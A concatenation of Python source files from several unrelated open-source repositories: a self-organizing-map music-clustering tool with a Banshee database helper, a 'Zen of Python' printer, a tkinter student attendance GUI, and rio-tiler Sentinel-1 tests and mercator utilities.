z = int(self.indices[winner, 2])
return (x, y, z)
    def save(self):
        if self.weight_file is not None:
            np.save(self.weight_file, self.weights)
            return True
        return False
def scale(self, start, end):
return np.double(start + self.progress * (end - start))
def train(self, data):
# Some initial logistics
samples, dims = data.shape
# Check shape
assert(dims == self.dims)
# Set parameters
rate_lower = 0.1
rate_upper = 0.5
spread_lower = 1.0
spread_upper = self.edge_length / 3.0
shuffled = range(samples)
np.random.shuffle(shuffled)
# Create progress object
progress = Progress("Training MusicCube", samples)
for ix in range(samples):
# Pick a random vector
sample = data[shuffled[ix], :]
# Figure out who's the closest weight vector
# and calculate distances between weights and the sample
winner = get_winner(sample, self.nodes, self.dims,
self.weights, self.distances)
# Calculate the new learning rate and new learning spread
self.progress = float(ix) / float(samples)
self.rate = self.scale(rate_upper, rate_lower)
self.spread = self.scale(spread_upper, spread_lower)
# Update those weights
update_weights(sample, winner,
self.nodes, self.dims,
self.rate, self.spread,
self.weights, self.indices)
# Display progress
progress.display()
@jit(nopython=True)
def get_winner(sample, nodes, dims, weights, distances):
for n in range(nodes):
distances[n] = 0.0
for d in range(dims):
distances[n] += (sample[d] - weights[n, d]) ** 2.0
distances[n] **= 0.5
return np.argmin(distances)
@jit(nopython=True)
def update_weights(sample, winner, nodes, dims, rate, spread, weights, indices):
x = indices[winner, 0]
y = indices[winner, 1]
z = indices[winner, 2]
for n in range(nodes):
distance = ((x - indices[n, 0]) ** 2.0) + \
((y - indices[n, 1]) ** 2.0) + \
((z - indices[n, 2]) ** 2.0)
distance **= 0.5
dampening = np.e ** (-distance / (2.0 * spread ** 2.0))
dampening *= rate
for d in range(dims):
weights[n, d] += dampening * (sample[d] - weights[n, d])
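# Illustrative sketch with synthetic data; the 4x4x4 cube size and '/tmp'
# weight path are arbitrary choices for the demo:
if __name__ == '__main__':
    demo_cube = NumbaCube(edge_length=4, node_weights=42,
                          npy_path='/tmp', random_seed=1)
    demo_data = np.random.random((64, 42))
    demo_cube.train(demo_data)
    print demo_cube.get_position(demo_data[0])  # e.g. (2, 1, 3)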
|
jerleo/banshee-musiccube
|
musiccube/banshee.py
|
#
# banshee.py
#
# Copyright (C) 2015 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import os
import sqlite3
import urllib
import gi
gi.require_version('GConf', '2.0')
from gi.repository import GConf
class Banshee:
DB_PATH = ".config/banshee-1/banshee.db"
GCONF_KEY = "/apps/banshee-1/sources/_music_library_source_-_library/library-location"
class Connection:
def __init__(self, db_path):
self.db_path = db_path
def __enter__(self):
self.connection = sqlite3.connect(self.db_path) # PyDev: Forced built-in _sqlite3
return self.connection.cursor()
def __exit__(self, type, value, traceback): # @ReservedAssignment
self.connection.close()
return True
def __init__(self):
home = os.path.expanduser('~')
self.db_path = os.path.join(home, self.DB_PATH)
def library_source(self):
# client = gconf.client_get_default()
client = GConf.Client.get_default()
source = client.get_string(self.GCONF_KEY)
assert source, "GConf: %s not found" % self.GCONF_KEY
return source
def get_tracks(self):
result = {}
with self.Connection(self.db_path) as db:
db.execute("""SELECT Uri, TrackId
FROM CoreTracks
WHERE Uri LIKE 'file://%.mp3'
ORDER BY Uri""")
rows = db.fetchall()
for row in rows:
song = row[0].encode('ascii')
song = urllib.unquote(song)
song = song.replace("file://", "")
if os.path.exists(song):
result[song] = row[1]
return result
def create_table(self):
with self.Connection(self.db_path) as db:
db.executescript("""
DROP TABLE IF EXISTS MusicCube;
CREATE TABLE MusicCube (
TrackID INTEGER PRIMARY KEY,
Axis1 INTEGER,
Axis2 INTEGER,
Axis3 INTEGER );
""")
def update_tracks(self, song_positions):
self.create_table()
with self.Connection(self.db_path) as db:
banshee_songs = self.get_tracks()
for song in banshee_songs:
if song in song_positions:
track_id = banshee_songs[song]
grid = song_positions[song]
db.execute("INSERT INTO MusicCube VALUES( ?, ?, ?, ? )",
(track_id, grid[0], grid[1], grid[2]))
db.connection.commit()
|
jerleo/banshee-musiccube
|
musiccube/progress.py
|
#
# progress.py
#
# Copyright (C) 2015 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from os import linesep
from sys import stdout
class Progress:
STEPS = 50
TITLE = 25
def __init__(self, title, total):
self.total = total
self.count = 0
self.last = 0
self.width = float(total) / float(self.STEPS)
stdout.write(title.ljust(self.TITLE))
def display(self):
self.count += 1
curr = int(self.count / self.width)
dots = curr - self.last
for i in range(dots):
stdout.write(".")
if self.count == self.total:
stdout.write(linesep)
stdout.flush()
self.last = curr
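# Usage sketch: create one Progress per long-running loop and call
# display() once per item, as musiccube.py does.
if __name__ == '__main__':
    progress = Progress('Demo', 200)
    for _ in range(200):
        progress.display()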
|
csparpa/betterzen
|
betterzen.py
|
#!/usr/bin/env python
"""
A revised version of the Zen of Python
"""
from os import linesep as newline
from random import randrange
_header ="""
The Zen of Python, by <NAME>
"""
_aphorisms = [ "Beautiful is better than ugly.",
"Explicit is better than implicit.",
"Simple is better than complex.",
"Complex is better than complicated.",
"Flat is better than nested.",
"Sparse is better than dense.",
"Readability counts.",
"Special cases aren't special enough to break the rules.",
"Although practicality beats purity.",
"Errors should never pass silently.",
"Unless explicitly silenced.",
"In the face of ambiguity, refuse the temptation to guess.",
"There should be one-- and preferably only one --obvious way to do it.",
"Although that way may not be obvious at first unless you're Dutch.",
"Now is better than never.",
"Although never is often better than *right* now.",
"If the implementation is hard to explain, it's a bad idea.",
"If the implementation is easy to explain, it may be a good idea.",
"Namespaces are one honking great idea -- let's do more of those!" ]
def _to_lines(list_of_strings):
return newline.join(list_of_strings)
def zen():
"""
Prints the original Zen of Python by <NAME>
"""
print _header + _to_lines(_aphorisms)
def numbered_zen():
"""
Prints the Zen of Python, numbering each aphorism
"""
print _header + \
_to_lines(['%d. %s' % (n, apho) for n, apho in enumerate(_aphorisms, 1)])
def aphorism(index):
    """
    Prints the aphorism that you want
    :param index: the 1-based reference number of the aphorism, as shown
        by numbered_zen()
    :type index: int
    """
    print _aphorisms[index - 1]
def apropos(list_of_terms):
"""
Prints the aphorisms that include at least one of the provided keywords.
    String matching is exact and case insensitive.
:param list_of_terms: a list of keywords
:type list_of_terms: list
"""
matching_aphorisms = set()
for aphorism in _aphorisms:
for term in list_of_terms:
if term.lower() in aphorism.lower():
matching_aphorisms.add(aphorism)
if matching_aphorisms:
print _to_lines(list(matching_aphorisms))
def random():
"""
Prints a random aphorism
"""
    print _aphorisms[randrange(len(_aphorisms))]
# May the Zen be with you...
zen()
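# Illustrative calls when the module is imported rather than executed:
#   aphorism(7)          # prints the seventh aphorism
#   apropos(['better'])  # prints every aphorism containing "better"
#   random()             # prints one aphorism at random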
|
Error1996/Attendance-System
|
Attendance/attendance_v2.py
|
import tkinter
from tkinter import ttk
from PIL import ImageTk, Image, ImageFilter
from tkinter import messagebox
from tkinter import tix
import random
import threading
import time
from Data import teachers
class Login:
def __init__(self):
path = 'Source/unnamed.jpg'
image_old = Image.open(path)
#image_old = image_old.filter(ImageFilter.BLUR)
image = image_old.resize((app.winfo_screenwidth(), app.winfo_screenheight()), Image.ANTIALIAS)
image = ImageTk.PhotoImage(image)
self.t = ttk.Label(app, image=image).grid(rowspan=10, columnspan=10)
self.image = image
def rem(self, e, widget):
widget.delete(0, tkinter.END)
def f_pas(self, e):
text = self.pas['text']
if text == 'Show':
self.e_pass.configure(show='')
self.pas.configure(text='Hide')
else:
self.e_pass.configure(show='\u2022')
self.pas.configure(text='Show')
def enter_con(self, e, widget):
widget.configure(foreground='red')
if widget['text'] == 'Forgot Password':
widget.configure(font=('', 9, 'normal', 'roman', 'underline'))
def leave_con(self, e, widget):
widget.configure(foreground='black')
if widget['text'] == 'Forgot Password':
widget.configure(font=('', 9, 'normal', 'roman'))
def log_check(self, f1):
data = teachers.log()
hod = 0
if not data == []:
for _ in data:
if self.e_user.get() == _[0]:
hod = _[0]
if self.e_pass.get() == _[1]:
flag_log = 2
break
else:
flag_log = 1
break
else:
flag_log = 0
            if flag_log == 2:
f1.destroy()
m = messagebox.showinfo('Success', 'Logged in successfully !!!')
if m:
self.a = Attend(hod)
            elif flag_log == 1:
messagebox.showwarning('Warning', 'Incorrect Password !!!')
else:
messagebox.showwarning('Warning', 'Incorrect User Name !!!')
else:
if self.e_user.get() == 'Shubham':
if self.e_pass.get() == 'Error':
pass
else:
messagebox.showerror('Error', 'Wrong Administrator Password !!!')
else:
messagebox.showerror('Error', 'Wrong Administrator Name !!!')
def log(self, n1=None):
try:
self.a.n1.destroy()
except:
pass
f1 = ttk.Labelframe(app, text='Login', style='TLabelframe')
f1.grid(row=2, column=3, ipadx=50, rowspan=5, columnspan=4)
ttk.Label(f1, text='User Name', font=('times', 20)).pack(pady=10)
self.e_user = ttk.Entry(f1, width=25, font=('times', 20))
self.e_user.pack(pady=10)
self.e_user.bind('<Button-1>', lambda e, widget=self.e_user: self.rem(e, widget))
ttk.Label(f1, text='Password', font=('times', 20)).pack(pady=10)
self.e_pass = ttk.Entry(f1, width=25, font=('times', 20), show='\u2022')
self.e_pass.pack(pady=10)
self.e_pass.bind('<Button-1>', lambda e, widget=self.e_pass: self.rem(e, widget))
self.pas = ttk.Label(f1, cursor='hand2')
self.pas.configure(text='Show')
self.pas.bind('<Button-1>', self.f_pas)
self.pas.bind('<Enter>', lambda e, widget=self.pas: self.enter_con(e, widget))
self.pas.bind('<Leave>', lambda e, widget=self.pas: self.leave_con(e, widget))
self.pas.pack(anchor='e', padx=50)
forgot = tkinter.Label(f1, text='Forgot Password', font=('', 9, 'normal', 'roman'), cursor='hand2')
forgot.bind('<Enter>', lambda e, widget=forgot: self.enter_con(e, widget))
forgot.bind('<Leave>', lambda e, widget=forgot: self.leave_con(e, widget))
forgot.pack()
ttk.Button(f1, text='Submit', cursor='hand2', command=lambda: self.log_check(f1)).pack(pady=10)
class Attend:
def __init__(self, user):
self.user = user
self.n1 = ttk.Notebook(app, width=1200, height=600)
self.f1 = ttk.Frame(self.n1)
self.n1.add(self.f1, text=' Daily Record ')
self.f2 = ttk.Frame(self.n1)
self.n1.add(self.f2, text=' Monthly Record ')
self.f3 = ttk.Frame(self.n1)
self.n1.add(self.f3, text=' Settings ')
self.n1.grid(row=2, column=3)
threading.Thread(target=self.daily_rec).start()
threading.Thread(target=self.mon_rec).start()
threading.Thread(target=self.settings).start()
#state_1.Attend2(self.f1)
def daily_rec(self):
def cal(c):
import sys
import calendar
root = tkinter.Toplevel()
root.title('Ttk Calendar')
root.grab_set()
w = c.winfo_reqheight()
h = c.winfo_reqheight()
print(w, h)
root.geometry('+%d+%d' % (w, h))
tkinter.Label(root, text='NEW').pack()
root.mainloop()
def check():
for e, i in enumerate(v1):
if i.get() == 1:
for j in v2[e]:
j.set(1)
else:
for j in v2[e]:
j.set(0)
def cur_enter(ev, t1, t2, t3, t4):
t1.config(fg='red')
t2.config(fg='red')
t4.config(fg='red')
t3.config(foreground='red')
def cur_leave(ev, t1, t2, t3, t4):
t1.config(fg='black')
t2.config(fg='black')
t4.config(fg='black')
t3.config(foreground='black')
def log_out():
m = messagebox.askyesno('Alert', 'Do you want to Log Out ?')
if m:
l.log(self.n1)
frame = tkinter.Frame(self.f1)
frame.pack(pady=20, fill='x', expand=True)
back = ttk.Button(frame, text='<- Log Out', command=log_out)
back.grid(padx=20)
f = ttk.Frame(frame)
f.grid(row=0, column=1, padx=400)
ttk.Label(f, text='Date : ', font=(14)).grid(row=0, column=0)
e = ttk.Entry(f, font=(14), width=9)
e.grid(row=0, column=1)
e.insert(0, time.strftime('%d/%m/%Y'))
#e.config(state='disable')
'''c = ttk.Button(f, text='Calender')
c.config(command=lambda c=c: cal(c))
c.grid(row=0, column=2, padx=5)'''
submit = ttk.Button(f, text="Submit ->")
submit.grid(row=0, column=3, padx=435)
data = teachers.lec()
        if data:
for _ in data:
if _[0] == self.user:
c = _[1].split(',')
c.sort()
break
else:
pass
else:
c = ["CSE", "ECE", "ELECTRICAL", "CIVIL", "MECHANICAL"]
c.sort()
n2 = ttk.Notebook(self.f1, width=1200, height=600)
n2.pack(fill='both', expand=True)
v1 = []
v2 = []
for i in range(0, len(c)):
f = ttk.Frame(n2)
n2.add(f, text=' '+c[i]+' ')
canvas1 = tkinter.Canvas(f)
scrolly = tix.Scrollbar(f, command=canvas1.yview, orient='vertical')
canvas1.pack(side='left', fill='both', expand=True)
scrolly.pack(side='right', fill='y')
f2 = tkinter.Frame(canvas1, width=1100, height=550)
ttk.Label(f2, text='S.No.', font=('times', 14)).grid(row=0, column=0, padx=80, pady=20)
ttk.Label(f2, text='Roll No.', font=('times', 14)).grid(row=0, column=1, padx=80, pady=20)
ttk.Label(f2, text='Name', font=('times', 14)).grid(row=0, column=2, padx=80, pady=20)
ttk.Label(f2, text='Total Attended', font=('times', 14)).grid(row=0, column=4, padx=80, pady=20)
'''e = tix.Entry(f2)
e.insert(0, '01/01/2018')
e.grid(row=0, column=3, padx=80, pady=20)'''
v11 = tkinter.Variable()
v11.set(0)
v1.append(v11)
v21 = []
v2.append(v21)
for j in range(0, 50):
v21.append(tkinter.Variable())
v21[j].set(0)
t1 = tkinter.Label(f2, text=j+1, font=('helvatica', 12))
t1.grid(row=j+3, column=0, padx=20)
t2 = tkinter.Label(f2, text='181'+str(j), font=('helvatica', 12))
t2.grid(row=j+3, column=1, padx=70)
t3 = ttk.Label(f2, text='Student-'+str(j+1), font=('helvatica', 12), wraplength=100)
t3.grid(row=j+3, column=2, columnspan=2, padx=70)
t4 = tkinter.Label(f2, text=str(random.randrange(10))+'/10', font=('helvatica', 12))
t4.grid(row=j+3, column=4)
t5 = tix.Checkbutton(f2, onvalue=1, offvalue=0, variable=v21[j], font=('helvatica', 20))
t5.grid(row=j+3, column=5, padx=70)
t1.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_enter(ev, t1, t2, t3, t4))
t2.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_enter(ev, t1, t2, t3, t4))
t3.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_enter(ev, t1, t2, t3, t4))
t4.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_enter(ev, t1, t2, t3, t4))
t5.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_enter(ev, t1, t2, t3, t4))
t1.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_leave(ev, t1, t2, t3, t4))
t2.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_leave(ev, t1, t2, t3, t4))
t3.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_leave(ev, t1, t2, t3, t4))
t4.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_leave(ev, t1, t2, t3, t4))
t5.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_leave(ev, t1, t2, t3, t4))
'''for k in range(3, 200):
tix.Label(f2, text=k).grid(row=1, column=k)'''
tix.Checkbutton(f2, text='All', onvalue=1, offvalue=0, variable=v11, command=check).grid(row=0, column=5)
canvas1.create_window(0, 0, window=f2)
f2.update_idletasks()
canvas1.itemconfigure("frame")
canvas1.config(scrollregion=canvas1.bbox("all"))
canvas1.config(yscrollcommand=scrolly.set)
def mon_rec(self):
def bind_x(*args):
f.update_idletasks()
canvas1.xview(*args)
canvas2.xview(*args)
def OnMouseWheel(event):
canvas2.yview_scroll(int(-1*(event.delta/120)), "units")
return "break"
def cur_enter(ev, t1, t2, t3, t4, t5):
t1.config(fg='red')
t2.config(fg='red')
t3.config(foreground='red')
t4.config(fg='red')
for i in range(len(t5)):
t5[i].config(fg='red')
def cur_leave(ev, t1, t2, t3, t4, t5):
t1.config(fg='black')
t2.config(fg='black')
t3.config(foreground='black')
t4.config(fg='black')
for i in range(len(t5)):
t5[i].config(fg='black')
data = teachers.lec()
        if data:
for _ in data:
if _[0] == self.user:
c = _[1].split(',')
c.sort()
break
else:
pass
else:
c = ["CSE", "ECE", "ELECTRICAL", "CIVIL", "MECHANICAL"]
c.sort()
n2 = ttk.Notebook(self.f2)
n2.pack(fill='both', expand=True)
for i in range(0, len(c)):
f = ttk.Frame(n2, width=1150, height=10)
n2.add(f, text=' '+c[i]+' ')
frame1 = ttk.Frame(f)
frame1.pack(side='top', fill='x')
frame2 = ttk.Frame(f)
frame2.pack(fill='both', expand=True)
canvas1 = tkinter.Canvas(frame1, height=40)
canvas2 = tkinter.Canvas(frame2)
scrolly = tix.Scrollbar(frame2, command=canvas2.yview, orient='vertical')
scrollx = tix.Scrollbar(f, command=bind_x, orient='horizontal')
scrolly.pack(side='right', fill='y')
scrollx.pack(side='bottom', fill='x')
canvas1.pack(side='top', fill='x', expand=True)
canvas2.pack(side='left', fill='both', expand=True)
f.bind_all("<MouseWheel>", OnMouseWheel)
f1 = tkinter.Frame(canvas1)
f2 = tkinter.Frame(canvas2)
ttk.Label(f1, text='S.No.', font=('times', 14)).grid(row=0, column=0, padx=30)
ttk.Label(f1, text='Roll No.', font=('times', 14)).grid(row=0, column=1, padx=33)
ttk.Label(f1, text='Name', font=('times', 14)).grid(row=0, column=2, padx=54)
for j in range(0, 10):
ttk.Label(f1, text=j+1, font=('times', 14)).grid(row=0, column=4+j, padx=4)
for j in range(10, 30):
ttk.Label(f1, text=j+1, font=('times', 14)).grid(row=0, column=4+j, padx=1)
ttk.Label(f1, text='Total', font=('times', 14)).grid(row=0, column=j+5, padx=10)
'''e = tix.Entry(f2)
e.insert(0, '01/01/2018')
e.grid(row=0, column=3, padx=80, pady=20)'''
for j in range(0, 50):
t1 = tkinter.Label(f2, text=j+1, font=('helvatica', 12))
t1.grid(row=j+3, column=0, padx=40)
t2 = tkinter.Label(f2, text='181'+str(j), font=('helvatica', 12))
t2.grid(row=j+3, column=1, padx=40)
t3 = ttk.Label(f2, text='Student-'+str(j+1), font=('helvatica', 12), wraplength=100)
t3.grid(row=j+3, column=2, columnspan=2, padx=40)
t4 = tkinter.Label(f2, text=' '+str(random.randrange(10))+'/10 ', font=('helvatica', 12))
t4.grid(row=j+3, column=35)
t5 = []
for k in range(0, 10):
t = tkinter.Label(f2, text=str(random.choice(['A', 'P'])), font=('helvatica', 12))
t.grid(row=j+3, column=k+4, padx=2, sticky='W')
t5.append(t)
t.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_enter(ev, t1, t2, t3, t4, t5))
t.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_leave(ev, t1, t2, t3, t4, t5))
tkinter.Label(f2).grid(row=j+3, column=k+5)
for k in range(11, 21):
t = tkinter.Label(f2, text=str(random.choice(['A', 'P'])), font=('helvatica', 12))
t.grid(row=j+3, column=k+4, padx=4, sticky='W')
t5.append(t)
t.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_enter(ev, t1, t2, t3, t4, t5))
t.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_leave(ev, t1, t2, t3, t4, t5))
for k in range(21, 31):
t = tkinter.Label(f2, text=str(random.choice(['A', 'P'])), font=('helvatica', 12))
t.grid(row=j+3, column=k+4, padx=3, sticky='W')
t5.append(t)
t.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_enter(ev, t1, t2, t3, t4, t5))
t.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_leave(ev, t1, t2, t3, t4, t5))
t1.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_enter(ev, t1, t2, t3, t4, t5))
t2.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_enter(ev, t1, t2, t3, t4, t5))
t3.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_enter(ev, t1, t2, t3, t4, t5))
t4.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_enter(ev, t1, t2, t3, t4, t5))
t1.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_leave(ev, t1, t2, t3, t4, t5))
t2.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_leave(ev, t1, t2, t3, t4, t5))
t3.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_leave(ev, t1, t2, t3, t4, t5))
t4.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_leave(ev, t1, t2, t3, t4, t5))
'''for k in range(3, 200):
tix.Label(f2, text=k).grid(row=1, column=k)'''
canvas1.create_window(0, 0, window=f1)
canvas2.create_window(0, 0, window=f2)
f1.update_idletasks()
canvas1.itemconfigure("frame")
f2.update_idletasks()
canvas2.itemconfigure("frame")
canvas1.config(scrollregion=canvas1.bbox("all"))
canvas1.config(xscrollcommand=scrollx.set)
canvas2.config(scrollregion=canvas2.bbox("all"))
canvas2.config(yscrollcommand=scrolly.set)
canvas2.config(xscrollcommand=scrollx.set)
def settings(self):
def color1():
c1.config(fg='blue')
c1.after(500, color2)
def color2():
c1.config(fg='red')
c1.after(500, color3)
def color3():
c1.config(fg='green')
c1.after(500, color1)
n2 = ttk.Notebook(self.f3)
'''f1 = ttk.Frame(n2)
n2.add(f1, text=' Add a Student ')
f2 = ttk.Frame(n2)
n2.add(f2, text=' Remove a Student ')'''
n2.pack()
c1 = tkinter.Label(n2, text='Code Is In Construction !!!', font=('', 40))
c1.config(fg='red')
c1.pack()
c1.after(1000, color1)
if __name__ == '__main__':
app = tkinter.Tk()
app.title('Attendance System')
#app.geometry('1280x800')
app.wm_state('zoomed')
#app.configure(background='#008B8B')
s = ttk.Style()
s.configure('TLabelframe.Label', font=('times', 20))
s.configure('TNotebook', tabposition='n')
s.configure('TNotebook.Tab', font=('times', 16), padding=(10, 10, 10, 10))
#s.configure('TLabelframe', background='#008B8B')
l = Login()
l.log()
app.mainloop()
|
mvmendes/rio-tiler
|
tests/test_io_sentinel1.py
|
"""tests rio_tiler.io.sentinel1"""
import os
from io import BytesIO
import pytest
import rasterio
from mock import patch
from rio_tiler.errors import InvalidBandName, InvalidSentinelSceneId, TileOutsideBounds
from rio_tiler.io import sentinel1
SENTINEL_SCENE = "S1A_IW_GRDH_1SDV_20180716T004042_20180716T004107_022812_02792A_FD5B"
SENTINEL_BUCKET = os.path.join(os.path.dirname(__file__), "fixtures", "sentinel-s1-l1c")
with open(
"{}/GRD/2018/7/16/IW/DV/S1A_IW_GRDH_1SDV_20180716T004042_20180716T004107_022812_02792A_FD5B/productInfo.json".format(
SENTINEL_BUCKET
),
"r",
) as f:
SENTINEL_METADATA = f.read().encode("utf-8")
def mock_rasterio_open(asset):
"""Mock rasterio Open."""
assert asset.startswith("s3://sentinel-s1-l1c")
asset = asset.replace("s3://sentinel-s1-l1c", SENTINEL_BUCKET)
return rasterio.open(asset)
@pytest.fixture(autouse=True)
def testing_env_var(monkeypatch):
"""Set fake env to make sure we don't hit AWS services."""
monkeypatch.setenv("AWS_ACCESS_KEY_ID", "jqt")
monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "rde")
monkeypatch.delenv("AWS_PROFILE", raising=False)
monkeypatch.setenv("AWS_CONFIG_FILE", "/tmp/noconfigheere")
monkeypatch.setenv("AWS_SHARED_CREDENTIALS_FILE", "/tmp/noconfighereeither")
monkeypatch.setenv("GDAL_DISABLE_READDIR_ON_OPEN", "EMPTY_DIR")
@patch("rio_tiler.io.sentinel1.boto3_session")
def test_bounds_valid(session):
"""Should work as expected (get bounds)"""
session.return_value.client.return_value.get_object.return_value = {
"Body": BytesIO(SENTINEL_METADATA)
}
meta = sentinel1.bounds(SENTINEL_SCENE)
assert (
meta["sceneid"]
== "S1A_IW_GRDH_1SDV_20180716T004042_20180716T004107_022812_02792A_FD5B"
)
assert len(meta.get("bounds")) == 4
calls = session.return_value.client.return_value.get_object.call_args
assert calls[1]["Bucket"] == "sentinel-s1-l1c"
assert calls[1]["Key"].endswith("productInfo.json")
def test_parse_sceneid():
"""Test sentinel1._sentinel_parse_scene_id."""
meta = sentinel1.sentinel1_parser(SENTINEL_SCENE)
    assert meta["prefix"] == (
        "GRD/2018/7/16/IW/DV/"
        "S1A_IW_GRDH_1SDV_20180716T004042_20180716T004107_022812_02792A_FD5B"
    )
with pytest.raises(InvalidSentinelSceneId):
sentinel1.sentinel1_parser("S2A_tile_20170729_19UDP_0")
@patch("rio_tiler.io.sentinel1.rasterio")
def test_metadata(rio):
"""Test sentinel1.metadata."""
rio.open = mock_rasterio_open
meta = sentinel1.metadata(SENTINEL_SCENE, bands=("vv", "vh"))
assert meta["sceneid"] == SENTINEL_SCENE
assert len(meta["bounds"]) == 4
assert len(meta["statistics"].items()) == 2
assert meta["statistics"]["vv"]["min"] == 1
assert meta["statistics"]["vh"]["max"] == 507
meta = sentinel1.metadata(SENTINEL_SCENE, bands="vv")
assert len(meta["statistics"].items()) == 1
with pytest.raises(InvalidBandName):
sentinel1.metadata(SENTINEL_SCENE, bands=("nope", "vh"))
with pytest.raises(InvalidBandName):
sentinel1.metadata(SENTINEL_SCENE)
@patch("rio_tiler.io.sentinel1.rasterio")
def test_tile_valid_default(rio):
"""Test tile reading."""
rio.open = mock_rasterio_open
tile_z = 8
tile_x = 183
tile_y = 120
data, mask = sentinel1.tile(SENTINEL_SCENE, tile_x, tile_y, tile_z, bands="vv")
assert data.shape == (1, 256, 256)
assert mask.shape == (256, 256)
data, mask = sentinel1.tile(
SENTINEL_SCENE, tile_x, tile_y, tile_z, bands=("vv", "vh")
)
assert data.shape == (2, 256, 256)
assert mask.shape == (256, 256)
with pytest.raises(InvalidBandName):
sentinel1.tile(SENTINEL_SCENE, tile_x, tile_y, tile_z)
with pytest.raises(InvalidBandName):
sentinel1.tile(
SENTINEL_SCENE, tile_x, tile_y, tile_z, bands=("vv", "vh", "nope")
)
tile_z = 8
tile_x = 183
tile_y = 130
with pytest.raises(TileOutsideBounds):
sentinel1.tile(SENTINEL_SCENE, tile_x, tile_y, tile_z, bands=("vv"))
|
mvmendes/rio-tiler
|
rio_tiler/io/__init__.py
|
"""rio-tiler.io"""
|
mvmendes/rio-tiler
|
rio_tiler/mercator.py
|
"""rio-tiler: mercator utility functions."""
import math
from typing import Tuple, Union
from rasterio.io import DatasetReader, DatasetWriter
from rasterio.vrt import WarpedVRT
from rasterio.warp import calculate_default_transform, transform_bounds
from rio_tiler import constants
def _meters_per_pixel(zoom: int, lat: float = 0.0, tilesize: int = 256) -> float:
"""
    Return the pixel resolution for a given mercator tile zoom and latitude.
Parameters
----------
zoom: int
Mercator zoom level
lat: float, optional
Latitude in decimal degree (default: 0)
tilesize: int, optional
Mercator tile size (default: 256).
Returns
-------
Pixel resolution in meters
"""
return (math.cos(lat * math.pi / 180.0) * 2 * math.pi * 6378137) / (
tilesize * 2 ** zoom
)
def zoom_for_pixelsize(pixel_size: float, max_z: int = 24, tilesize: int = 256) -> int:
"""
Get mercator zoom level corresponding to a pixel resolution.
Freely adapted from
https://github.com/OSGeo/gdal/blob/b0dfc591929ebdbccd8a0557510c5efdb893b852/gdal/swig/python/scripts/gdal2tiles.py#L294
Parameters
----------
pixel_size: float
Pixel size
max_z: int, optional (default: 24)
Max mercator zoom level allowed
tilesize: int, optional
Mercator tile size (default: 256).
Returns
-------
Mercator zoom level corresponding to the pixel resolution
"""
for z in range(max_z):
if pixel_size > _meters_per_pixel(z, 0, tilesize=tilesize):
return max(0, z - 1) # We don't want to scale up
return max_z - 1
def get_zooms(
